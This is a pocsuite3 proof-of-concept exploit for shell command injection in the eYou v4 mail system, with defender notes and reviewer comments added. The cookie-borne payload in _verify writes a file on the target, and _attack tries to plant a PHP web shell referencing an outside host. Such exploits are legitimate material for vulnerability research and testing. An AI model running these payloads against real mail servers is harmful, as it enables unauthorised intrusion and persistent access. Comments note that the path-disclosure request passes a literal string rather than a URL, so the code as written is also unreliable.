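"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
import re

# Matches the PHP error text that discloses the absolute directory holding
# list.php; group 1 is that directory. Written as a raw string so that `\(` and
# `\.` reach the regex engine without invalid-escape warnings (same pattern as
# the two inline copies it replaces).
_INSTALL_PATH_RE = re.compile(r'eyou_error\(\) in <b>(.*)/list\.php</b> on line')


class DemoPOC(POCBase):
    """pocsuite3 PoC for command execution in eYou v4 /user/storage_explore.php.

    Root cause, as stated in ``desc``: getUserDirPath($uid, $domain) runs a
    command string in PHP backticks, and this PoC reaches it through the
    ``USER`` cookie.

    Defender notes derived from the requests below:
      * Detection: requests to /user/storage_explore.php whose Cookie header
        carries shell metacharacters (``|``, ``>``) in the ``USER=UID=`` value,
        followed by a request for a randomly named .txt or .php file under
        /user/.
      * Artifacts: both methods create a file in the disclosed directory and
        never remove it; it has to be cleaned up by hand after a test.
      * Mitigation: the source page lists no vendor fix. The general remedy
        for this class is to validate the cookie-derived uid/domain against a
        strict allow-list and to stop passing them to a shell.
    """

    vulID = '1248'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2014-04-22'
    createDate = '2014-04-30'
    updateDate = '2014-04-30'
    references = ['http://wooyun.org/bugs/wooyun-2014-058301']
    # "命令执行漏洞" = "command execution vulnerability".
    name = 'eYou v4 /storage_explore.php 命令执行漏洞 POC'
    appPowerLink = 'http://www.eyou.net'
    appName = 'eYou'
    appVersion = 'V4#'
    # Was 'SQL Injection', which contradicts both `name` and `desc`: the flaw
    # is shell command execution, and no SQL is involved anywhere in this PoC.
    vulType = 'Command Execution'
    # desc (translation): eYou mail system V4 has a page
    # /user/storage_explore.php that calls getUserDirPath($uid, $domain); that
    # function contains the code $path = `$cmd`, so the command shell can be
    # invoked directly.
    desc = '''
        eyou邮件系统V4存在一处/user/storage_explore.php页面,该页面调用了
        getUserDirPath($uid, $domain)函数,该函数存在的$path = `$cmd`代码
        使得CMD控制台可以直接调用。
    '''
    samples = []
    install_requires = ['']

    def _verify(self):
        """Check the target by writing a marker file and reading it back.

        Returns:
            The Output built by parse_output(): success with ``VerifyInfo``
            (URL and the repr of the headers sent) when the marker text is
            served back, otherwise failure.
        """
        result = {}
        vul_url_get_shell = '%s/user/storage_explore.php' % self.url
        # NOTE(review): the argument is the literal string "vul_url_get_path",
        # not a URL; no variable of that name is defined in this file and the
        # page does not show which endpoint was meant, so it is left unchanged.
        # As written this call most likely raises before the target is
        # contacted, which would make the PoC report nothing — confirm.
        response = requests.get("vul_url_get_path").text
        path = _INSTALL_PATH_RE.findall(response)
        if path:
            # random_str(5): presumably a 5-character random file name.
            file_name = random_str(5)
            headers = {'Cookie': 'USER=UID=1+|echo tEst_bY_360 > %s/%s.txt' % (path[0], file_name)}
            requests.get(vul_url_get_shell, headers=headers)
            # Fetch the file back; the marker text is the only success signal.
            response = requests.get('%s/user/%s.txt' % (self.url, file_name)).text
            if 'tEst_bY_360' in response:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url_get_shell
                # The key is named "Postdata" but holds the request headers.
                result['VerifyInfo']["Postdata"] = repr(headers)
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite3 Output: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Attack-mode counterpart of _verify that targets a .php file.

        Returns:
            The Output built by parse_output(): success with ``ShellInfo``
            (URL and Content) when the POST to the created file returns 200
            and the body contains "phpinfo", otherwise failure.
        """
        php_attack = 'http://pocsuite.org/include_files/php_attack.txt'
        result = {}
        vul_url_get_shell = '%s/user/storage_explore.php' % self.url
        # NOTE(review): same literal-string argument as in _verify; see the
        # note there. Left unchanged because the intended URL is not on the
        # page.
        response = requests.get("vul_url_get_path").text
        path = _INSTALL_PATH_RE.findall(response)
        if path:
            file_name = random_str(5)
            headers = {'Cookie': 'USER=UID=1+|echo %s > %s/%s.php' % (php_attack, path[0], file_name)}
            requests.get(vul_url_get_shell, headers=headers)
            shell_url = '%s/user/%s.php' % (self.url, file_name)
            r = requests.post(shell_url, data="phpinfo();")
            if r.status_code == 200 and "phpinfo" in r.text:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = shell_url
                # NOTE(review): 'Content' is downloaded from php_attack (plain
                # HTTP, third-party host), not read back from the target, so it
                # is not evidence of what the created file actually contains.
                result['ShellInfo']['Content'] = requests.get(php_attack).text
        return self.parse_output(result)


register_poc(DemoPOC)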
暂无官方解决方案
暂无防护方案